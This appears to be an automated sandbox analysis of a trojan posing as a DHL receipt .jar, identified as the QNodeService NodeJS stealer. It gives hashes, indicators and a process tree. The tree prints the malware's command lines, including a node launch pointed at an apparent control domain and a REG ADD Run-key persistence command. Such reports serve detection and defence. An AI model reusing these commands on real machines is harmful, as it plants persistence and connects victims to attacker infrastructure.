Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 08:59
Static task
static1
Behavioral task
behavioral1
Sample
DHL_10090AWB_09800123_RECIEPT00097 .jar
Resource
win7
Behavioral task
behavioral2
Sample
DHL_10090AWB_09800123_RECIEPT00097 .jar
Resource
win10
General
-
Target
DHL_10090AWB_09800123_RECIEPT00097 .jar
-
Size
74KB
-
MD5
a754d565bf2979dc8a1e8963199fd466
-
SHA1
358b81c4665da96231c0b038a198eeedc905f36b
-
SHA256
7d652ebf3fc8f1368ff81ac8079ce332a8fde810bd4d7eca30a99196ba861114
-
SHA512
f0ec805734aab2edf833ff9149e534e214cb926da0e453896af29a5a9ec8113c46703675460e7d28032cfae766c3c20a8b0de9843ab4b95444b7b2589cc6b065
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1904 node.exe 192 node.exe 4036 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\c311ae97-2207-4a0f-824d-4c118b9cd9f5 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab5b-173.dat js behavioral2/files/0x000100000001ab5b-176.dat js behavioral2/files/0x000100000001ab5b-180.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 wtfismyip.com 24 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1904 node.exe 1904 node.exe 1904 node.exe 1904 node.exe 192 node.exe 192 node.exe 192 node.exe 192 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3952 wrote to memory of 3724 3952 java.exe 75 PID 3952 wrote to memory of 3724 3952 java.exe 75 PID 3724 wrote to memory of 1904 3724 javaw.exe 79 PID 3724 wrote to memory of 1904 3724 javaw.exe 79 PID 1904 wrote to memory of 192 1904 node.exe 81 PID 1904 wrote to memory of 192 1904 node.exe 81 PID 192 wrote to memory of 4036 192 node.exe 82 PID 192 wrote to memory of 4036 192 node.exe 82 PID 4036 wrote to memory of 3776 4036 node.exe 84 PID 4036 wrote to memory of 3776 4036 node.exe 84 PID 3776 wrote to memory of 3284 3776 cmd.exe 85 PID 3776 wrote to memory of 3284 3776 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL_10090AWB_09800123_RECIEPT00097 .jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\d278f90a.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.js --hub-domain glotronic.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:192 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.js --hub-domain glotronic.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c311ae97-2207-4a0f-824d-4c118b9cd9f5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c311ae97-2207-4a0f-824d-4c118b9cd9f5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3284
-
-
-
-
-
-